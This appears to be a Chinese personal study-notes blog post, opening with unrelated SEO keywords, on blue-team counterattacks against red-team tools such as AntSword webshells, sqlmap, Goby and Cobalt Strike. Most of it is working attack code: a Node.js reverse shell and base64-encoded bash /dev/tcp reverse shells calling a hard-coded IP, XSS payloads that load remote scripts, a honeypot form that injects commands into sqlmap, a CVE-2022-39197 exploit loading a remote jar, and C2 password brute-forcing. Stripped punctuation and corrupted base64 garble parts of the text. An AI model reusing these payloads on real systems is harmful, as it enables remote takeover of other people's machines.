定西模板型网站建设,现有的网站开发技术,wordpress代码解释,平台式建站用途#xff1a;个人学习笔记#xff0c;欢迎指正
目录
背景#xff1a;
一、后门修改反制上线
二、Linux溯源反制-SQL注入工具-SQLMAP
1、测试反弹编码加密#xff1a;
2、构造注入点页面test.php固定注入参数值#xff0c;等待攻击者进行注入
3、红队攻击者进行注…用途个人学习笔记欢迎指正
目录
背景
一、后门修改反制上线
二、Linux溯源反制-SQL注入工具-SQLMAP
1、测试反弹编码加密
2、构造注入点页面test.php固定注入参数值等待攻击者进行注入
3、红队攻击者进行注入测试
三、溯源反制-漏洞扫描工具-Goby
(1)、构造页面index.php:
(2)、将index.php1.js放入网站目录
(3)、模拟红队使用Goby扫描分析漏洞触发代码反而被蓝队拿到权限CS上线
四、 溯源反制-远程控制工具-CobaltStrike
1、伪造流量批量上线欺骗防御
2、利用漏洞(CVE-2022-39197)
3、反制Server,爆破密码通用 背景 黑客一般会用到工具Sqlmap,Goby等对目标网站的现有资产做批量扫描和测试同时也会利用Web应用漏洞上传后门来上线肉机用到工具例如蚁剑CS等那么作为蓝队应急人员就可以针对这些行为采取反制手段。 一、后门修改反制上线 原理网站目录查到红队后门时蓝队修改后门添加上线代码当红队使用蚁剑连接后门时触发代码反而被上线. 1、后门修改测试
?php
header(HTTP/1.1 500 img src# onerroralert(1));2、后门修改上线Nodejs代码
var net require(net), sh
require(child_process).exec(cmd.exe);
var client new net.Socket();
client.connect(1122, 47.94.236.117, //蓝队控制端IP和端口
function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});3、编码组合后
header(HTTP/1.1 500 Not img src# onerroreval(new
Buffer(mFyIG5ldCA9IHJIcXVpcmUolm5ldClpLCBzaCA9IHJIcXVpcmUolmNoaW
xkX3Byb2NIc3MiKS5leGVjKCJjbWQuZXhllik7CnZhciBjbGllbnQgPSBuZXcgbmVo
LINvY2tldCgpOwpjbGllbnQuY29ubmVjdCgxMDA4NiwgljQ3Ljk0LjIzNi4xMTciLC
BmdW5jdGlvbigpe2NsaWVudC5waXBIKHNoLnNOZGluKTtzaC5zdGRvdXQucGlwZShj
bGllbnQpO3NoLnNOZGVyci5waXBIKGNsaWVudCk7fSk7,base64).toString()
));管道符 中放的就是2中代码的base64加密值
二、Linux溯源反制-SQL注入工具-SQLMAP 蓝队提前构造注入页面诱使红队进行sqlmap注入拿到红队机器权限 环境红队攻击机和蓝队主机都是linux系统 原理 命令管道符ping dir linux系统执行该命令时管道符中的字符串被当作命令执行 sqlmap -u http://47.94.236.117/test.html?idaaabdir sqlmap -u http://47.94.236.117/test.html?idaaabexec /bin/sh 0/dev/tcp/47.94.236.117/2233 10 20
同样以上命令在红队攻击机执行时参数b管道符中的字符串会被当做命令执行。
1、测试反弹编码加密 bash -i /dev/tcp/47.94.236.117/2233 01 YmFzaCAtaSAJiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzlzMzMgMD4mMQ echo YmFzaCAtaSAJiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzlzMzMgMD4mMQ | base64 -d |bash -i 2、构造注入点页面test.php固定注入参数值等待攻击者进行注入
html
headmeta charsetutf-8titleA sqlmap honeypot demo/title
/head
bodyinputsearch the user/input !--创建一个空白表单-form actionusername.html methodpost
enctypetext/plain!--创建一个隐藏的表单--input typehidden namename
valuexiaodiid45273434queryshellecho
YmFzaCAtaSAJiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LZIzMzMgMD4mMQ
base64 -d|bash -iport6379/!--创建一个按钮提交表单内容-input typesubmit value提交/form
/body
/html
3、红队攻击者使用Sqlmap进行注入测试反被上线 原理红队执行这个注入命令时管道符中的加密字符串被解密后执行而解密执行的命令就是反弹shell的命令使用Sqlmap工具时不知不觉就把shell权限给出去了 sqlmap -u http://xx.xx.xx.xx/test.php --data
namexiaodiid45273434queryshellecho
YmFzaCAtaSAJiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzIzMzMgMD4mMQ |
base64 -d|bash -iport6379 三、溯源反制-漏洞扫描工具-Goby
环境蓝队Linux系统 Web程序 红队Windows10 Goby
原理蓝队在红队攻击目标上写一个特殊文件红队用goby扫描分析时会触发反制被蓝队拿到机器权限。
1、构造页面index.php:
?php
header(X-Powered-By:PHP/img src1 onerrorimport(unescape(http%3A//47.94.236.117/1.js)));
?
head
titleTEST/title
/head
body
testtest
/body
/html
构造1.js代码 cs上线只需要把calc.exe改成powershell代码
(function(){
require(child_process).exec(calc.exe);
})();
2、将index.php1.js放入网站目录
3、模拟红队使用Goby扫描分析漏洞触发代码反而被蓝队拿到权限CS上线 四、 溯源反制-远程控制工具-CobaltStrike
蓝队Linux Web 红队Windows10 Goby 对抗Cobaltstrike中的手段
1、伪造流量批量上线欺骗防御
https://mp.weixin.qq.com/s/VCRg6F9Wq-yg-qajDoJuaw
2、利用漏洞(CVE-2022-39197) Cobalt Strike 4.7 XSS ·获取真实ip地址 ·获取NTLM ·RCE ·SSRF 地址https://github.com/its-arun/CVE-2022-39197 (1)、蓝队修改EXP里面的执行命令后编译成jar包 修改EvilJar/src/main/java/Exploit.java 中的执行命令 (2)、蓝队修改svg加载地址并架设Web服务 修改evil.svg 指向url地址只要evil.svg被访问就会加载这个jar包命令就会执行。
svg xmInshttp://www.w3.org/2000/svg xmIns:xlinkhttp://www.w3.org/1999/xlink version1.0
script typeapplication/java-archive xlink:hrefhttp://47.94.236.117:8888/EvilJar-1.0-jar-with-dependencies.jar/
textCVE-2022-39197/text
/svg
架设Web服务
python -m http.server 8888
(3)、蓝队利用EXP主动运行红队的后门被上线攻击者CS客户端进程查看时触发加载蓝队架设的web服务jar包中的命令就会执行。
python cve-2022-39197.py artifact.exe http://47.94.236.117:8888/evil.svg原理蓝队利用exp主动运行后门被红队上线当红队CS客户端查看进程时触发加载这个web服务evil.svg
文件而这个文件又加载了EvilJar-1.0-jar-with-dependencies.jar这个jar包中蓝队构造的命
令就被执行从而达到反制红队的效果。
3、反制Server,爆破密码通用 针对没有采用隐匿C2地址的技术导致的反制(后门样本被溯源到C2地址) https://github.com/ryanohoro/csbruter python csbruter.py 47.94.236.117 pass.txt
